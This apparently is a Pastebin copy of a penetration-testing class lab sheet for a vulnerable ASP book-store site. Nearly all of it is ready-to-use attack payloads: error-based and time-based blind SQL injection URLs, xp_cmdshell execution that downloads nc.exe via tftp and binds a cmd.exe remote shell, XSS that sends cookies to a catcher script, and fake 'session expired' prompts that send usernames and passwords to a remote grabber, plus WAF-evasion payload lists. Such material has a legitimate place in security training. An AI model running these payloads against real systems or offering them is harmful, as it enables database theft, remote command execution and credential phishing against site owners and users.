Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################
- # Find/Replace #
- ################
- yourname -- Replace this with your name
- 172.16.0.180 -- Replace this with the instructor ip
- Win2K-WebApp-Host -- Replace this with the webapp host ip
- 56789 -- Replace with a port that is not in use by another student
- #########################################################################################
- # Basic SQL Injection Walthrough #
- # ------------------------------ #
- # A good reference for syntax is located at: #
- # http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet #
- #########################################################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2
- Notice the paramater passing:
- Books.asp ? STechID = 2
- The ? let's you know that the site is using parameter passing. In this case the site is passing the
- parameter name (STechID), and the parameter value (2) to the database.
- Parameter Name = STechID
- Parameter Value = 2
- ###############################################
- # ERROR SQL INJECTION - EXTRACT DATABASE USER #
- ###############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT user)--
- Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
- ##################################################
- # ERROR SQL INJECTION - EXTRACT DATABASE VERSION #
- ##################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select @@VERSION)--
- ###############################################
- # ERROR SQL INJECTION - EXTRACT DATABASE NAME #
- ###############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT db_name())--
- Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
- #############################################
- # ERROR SQL INJECTION - EXTRACT SERVER NAME #
- #############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (@@SERVERNAME)--
- Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.
- Another option is:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT @@servername)--
- #########################################
- # ERROR SQL INJECTION - List DATABASES #
- #########################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(0))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(1))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(2))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(3))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(4))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(N))--
- #####################################################
- # ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE #
- #####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
- Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
- ####################################################
- # ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE #
- ####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Books')--
- Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.
- ####################################################
- # ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE #
- ####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Buyers')--
- Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.
- ####################################################
- # ERROR SQL INJECTION - EXTRACT 4th DATABASE TABLE #
- ####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Orders')--
- Syntax error converting the nvarchar value '[TABLE NAME 4]' to a column of data type int.
- ################################
- # Basic MS-SQL Blind Injection #
- ################################
- BLIND SQL INJECTION - DETECTION
- ###############################################
- # BLIND SQL INJECTION - EXTRACT DATABASE USER #
- ###############################################
- 3 - Total Characters
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- D - 1st Character
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- B - 2nd Character
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- O - 3rd Character
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- ##############################################
- # Executing System Commands With xp_cmdshell #
- ##############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\book\dir_yourname.txt'--
- Check it
- --------
- http://Win2K-WebApp-Host/book/dir_yourname.txt
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ipconfig+>+c:\inetpub\wwwroot\book\ipconfig_yourname.txt'--
- Check it
- --------
- http://Win2K-WebApp-Host/book/ipconfig_yourname.txt
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'netstat+>+c:\inetpub\wwwroot\book\netstat_yourname.txt'--
- Check it
- --------
- http://Win2K-WebApp-Host/book/netstat_yourname.txt
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'tftp -i 172.16.0.180 GET nc.exe c:\\yourname_nc.exe'--
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'c:\\yourname_nc.exe -l -p 56789 -e cmd.exe'--
- Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
- Open a duplicate session in Putty and type the following:
- ---------------------------------------------------------
- nc Win2K-WebApp-Host 56789
- Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
- #################################
- # Really basic XSS walk-through #
- #################################
- 1. Use Firefox to browse to the following location:
- http://199.204.214.176/xss_practice/
- A really simple search page that is vulnerable should come up.
- 2. In the search box type:
- <script>alert('So this is XSS')</script>
- This should pop-up an alert window with your message in it proving XSS is in fact possible.
- 3. In the search box type:
- <script>alert(document.cookie)</script>
- This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
- 4. Now replace that alert script with:
- <script>document.location="http://199.204.214.176/xss_practice/cookie_catcher.php?c="+document.cookie</script>
- This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
- 5. Now view the stolen cookie at:
- http://199.204.214.176/xss_practice/cookie_stealer_logs.html
- The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
- ############################
- # A Better Way To Demo XSS #
- ############################
- Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
- Use Firefox to browse to the following location:
- http://199.204.214.176/xss_practice/
- Paste this in the search box
- ----------------------------
- Option 1
- --------
- <script>
- password=prompt('Your session is expired. Please enter your password to continue',' ');
- document.write("<img src=\"http://199.204.214.176/xss_practice/passwordgrabber.php?password=" +password+"\">");
- </script>
- Now view the stolen cookie at:
- http://199.204.214.176/xss_practice/passwords.html
- Option 2
- --------
- <script>
- username=prompt('Please enter your username',' ');
- password=prompt('Please enter your password',' ');
- document.write("<img src=\"http://199.204.214.176/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
- </script>
- Now view the stolen cookie at:
- http://199.204.214.176/xss_practice/username_password_logs.html
- Tell me what these commands do (1 point for each command ), and do they get detected by the IDS:
- ------------------------------------------------------------------------------------------------
- Browse to the following URL:
- http://Win2K-WebApp-Host/book/
- In the Search box type each of the following:
- <script>alert('xss')</script>
- <script>alert(1)</script>
- <script>alert(String.fromCharCode(88,83,83))</script>
- %3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E
- prompt('xss')
- prompt%28%27xss%27%29
- http://Win2K-WebApp-Host/book/
- Click "ASP"
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1
- Click "Professional ASP"
- http://Win2K-WebApp-Host/book/ViewBookDetails.asp?STechID=1&BookID=1
- Click "Write A Review"
- In the "Write Your Review" box type:
- <script>alert('xss')</script>
- http://Win2K-WebApp-Host/book/
- Click "ASP"
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1
- Click "Professional ASP"
- http://Win2K-WebApp-Host/book/ViewBookDetails.asp?STechID=1&BookID=1
- Click "Upload Review"
- Create a file called yourname.txt - and in the file insert the text:
- <script>alert('xss')</script>
- Upload the newly created file
- ####################################
- # Web Application Firewall Evasion #
- ####################################
- Go to the addresses below in firefox:
- http://strategicsec.com/apt.exe
- http://strategicsec.com/nc.exe
- http://strategicsec.com/joe.exe
- http://strategicsec.com/cmd.exe
- What are the differences between each of the links above?
- Go to the address below in firefox:
- http://modsecurity.org/demo/crs-demo.html
- Insert the following payloads and keep track of the scores each payload receives
- --------------------------------------------------------------------------------
- SQL Injection Payloads
- ----------------------
- ' or 1=1--
- ' or '1'='1--
- %27%201=1%2D%2D
- ' and 8<9--
- %27%20and%208<9%2D%2D
- Cross Site Scripting Payloads
- -----------------------------
- <script>alert('xss')</script>
- %3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E
- prompt('xss')
- prompt%28%27xss%27%29
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement